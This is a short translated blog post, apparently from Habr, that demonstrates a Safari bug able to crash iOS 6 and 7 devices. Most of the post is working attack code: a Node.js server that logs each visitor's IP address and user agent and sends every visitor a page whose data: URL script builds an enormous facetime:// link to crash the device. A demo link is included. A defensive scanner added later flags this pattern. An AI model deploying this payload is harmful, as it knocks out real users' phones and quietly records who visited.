
Reboot iOS. Simple and tasteful

Good day, ladies and gentlemen!
This post will be very short, unfortunately, but it demonstrates a vulnerability that affects many iOS devices.




Almost all iOS devices on the 7th branch are affected, and partially those on the 6th. I am not able to test further. I would be extremely grateful if you reported in the comments how your device behaves.

Demonstration:

(alas, no longer available)

r0sheR.js:

// Banner
console.log(" _____ _ ______ _ ");
console.log(" | _ | | | | ___ \\ (_) ");
console.log(" _ __| |/' | ___| |__ ___| |_/ / _ ___ ");
console.log("| '__| /| |/ __| '_ \\ / _ \\ / | / __|");
console.log("| | \\ |_/ /\\__ \\ | | | __/ |\\ \\ _| \\__ \\");
console.log("|_| \\___/ |___/_| |_|\\___\\_| \\_(_) |___/");
console.log("r0sheR.js is a part of IOS EX kit _/ |");
console.log(" fil9 (2013) fil9bob@gmail.com |__/");

// The listening port is the only command-line argument
var lport = process.argv[2];
if (!lport) {
    console.log('Usage: ' + process.argv[0] + ' ' + process.argv[1] + ' [80,8080...]');
    process.exit(1);
} else if (lport <= 0 || lport > 65535) {
    console.log("Invalid port!\n");
    process.exit(1);
}

var http = require('http'),
    fs = require('fs');

// Every request, whatever the path, is logged and answered with page.html
http.createServer(function (rq, rs) {
    rs.writeHead(200, { 'Content-Type': 'text/html' });
    console.log('[!] New request from: ' + rq.connection.remoteAddress);
    console.log('[!] UserAgent: ' + rq.headers['user-agent']);
    fs.readFile('./page.html', function (err, data) {
        if (err) throw err;
        rs.end(data);
    });
    console.log('DOS parcel sent :)');
}).listen(lport, '0.0.0.0');


page.html (the payload is kept separately, which proved more convenient):

<html>
<head>
<title>IOS 7 CRASH</title>
</head>
<body>
<script>
document.location.replace("data:text/html,%3Cscript%3Eif(navigator.userAgent.indexOf('Safari') != -1){var a,b='';for(var i=1;i<=300000;i++) a='A'+a; document.location.replace('facetime://'+a+a+a+a)}%3C/script%3E");
</script>
</body>
</html>


Demo: http://sn.im/28gw4wx

The bug is that Safari lets a page launch FaceTime directly. An attacker could exploit this to cause a denial of service. And perhaps something more.
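For filtering or triage, the pattern described above (a script that navigates to an app-launching scheme, with the target built at runtime and the script tucked inside a `data:` URL) can be flagged statically. The following is an added example, not code from the original post; the function names, the scheme list, the length cap and both sample pages are assumptions constructed for illustration.

```javascript
// Added example: static triage of HTML for script-driven app-scheme navigation.
const SCHEMES = ['facetime', 'facetime-audio', 'tel']; // assumed watch list
const MAX_TARGET_LEN = 256; // assumed cap: a call target is a number or e-mail
const MAX_DEPTH = 3;        // how many nested data: documents to unwrap

function decode(s) {
  try { return decodeURIComponent(s); } catch { return s; } // tolerate bad %xx
}

// Return the page with nested data:text/html documents cut out, followed by
// each nested document percent-decoded, so every script is scanned once.
function unwrapLayers(html, depth = 0) {
  const re = /(["'])data:text\/html[^,]*,([\s\S]*?)\1/gi;
  if (depth >= MAX_DEPTH) return [html];
  const nested = [...html.matchAll(re)]
    .flatMap(m => unwrapLayers(decode(m[2]), depth + 1));
  return [html.replace(re, '$1$1'), ...nested];
}

function scanPage(html) {
  // location = / location.href = / location.replace( / location.assign(
  // followed by a quoted literal that starts with a watched scheme.
  const nav = new RegExp(String.raw`location\s*(?:\.href\s*=|\.(?:replace|assign)\s*\(|=)\s*(["'])((?:${SCHEMES.join('|')}):[^"']*)\1\s*(\+)?`, 'gi');
  const findings = [];
  unwrapLayers(html).forEach((text, layer) => {
    for (const m of text.matchAll(nav)) {
      const reasons = [];
      if (m[3]) reasons.push('target built at runtime by concatenation');
      if (m[2].length > MAX_TARGET_LEN) reasons.push('literal target exceeds length cap');
      if (layer > 0) reasons.push('navigation hidden inside a data: URL');
      if (reasons.length) findings.push({ layer, target: m[2].slice(0, 40), reasons });
    }
  });
  return findings;
}

// Constructed samples: same structure as page.html above, but harmless.
const SAMPLE_SUSPICIOUS = `<script>document.location.replace("data:text/html,%3Cscript%3Evar a='A';document.location.replace('facetime://'+a)%3C/script%3E");</script>`;
const SAMPLE_BENIGN = `<script>location.href = 'facetime://user@example.com';</script>`;

console.log(JSON.stringify(scanPage(SAMPLE_SUSPICIOUS), null, 2));
console.log(scanPage(SAMPLE_BENIGN).length === 0 ? 'benign page: no findings' : 'unexpected finding');
```

A static check like this is a heuristic: it only sees targets written as a quoted literal next to the navigation call, so it complements a length and format check at the point where the URL is handed to the handler rather than replacing it.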

P.S. I recently found out that the vulnerability used by evasi0n7 will be closed in iOS 7.0.5.
Who knows, maybe a jailbreak can be expected for iOS 7.1 already :)

Source: https://habr.com/ru/post/208356/

